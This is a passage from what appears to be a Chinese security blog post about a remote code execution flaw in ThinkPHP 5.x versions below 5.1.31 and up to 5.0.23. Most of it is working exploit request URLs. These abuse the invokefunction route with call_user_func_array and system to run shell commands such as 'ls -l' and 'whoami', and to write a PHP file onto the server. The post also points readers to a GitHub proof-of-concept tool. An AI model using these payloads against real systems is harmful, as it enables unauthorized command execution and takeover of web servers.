ThinkPHP V5.x 远程代码执行漏洞利用(附POC)

  • A+
所属分类:颓废's Blog
摘要

由于ThinkPHP5 框架控制器名 没有进行足够的安全监测,导致在没有开启强制路由的情况下,可以伪装特定的请求可以直接Getshell


漏洞描述:

由于ThinkPHP5 框架控制器名 没有进行足够的安全监测,导致在没有开启强制路由的情况下,可以伪装特定的请求可以直接Getshell

影响范围:v5.x < 5.1.31,<= 5.0.23 

漏洞详情:

本地搭建了一个ThinkPHP5 的环境

https://www.0dayhack.com/public/index.php?s=/index//think/app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l

ThinkPHP V5.x 远程代码执行漏洞利用(附POC)

看看权限

https://www.0dayhack.com/public/index.php?s=/index//think/app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

ThinkPHP V5.x 远程代码执行漏洞利用(附POC)

写个phpinfo

https://www.0dayhack.com/public/index.php?s=/index//think/app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20%27<?php%20phpinfo();?>%27%20>%20info.php

ThinkPHP V5.x 远程代码执行漏洞利用(附POC)

查看一下

ThinkPHP V5.x 远程代码执行漏洞利用(附POC)

附上github上的一个poc利用

Dependencies:

pip install -r requirements.txt

ThinkPHP V5.x 远程代码执行漏洞利用(附POC)

给上地址:

https://github.com/heroanswer/thinkphp_rce_poc/

附上自己弄的  有点小鸡肋,就不用放出了

ThinkPHP V5.x 远程代码执行漏洞利用(附POC)

鸡肋ing

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: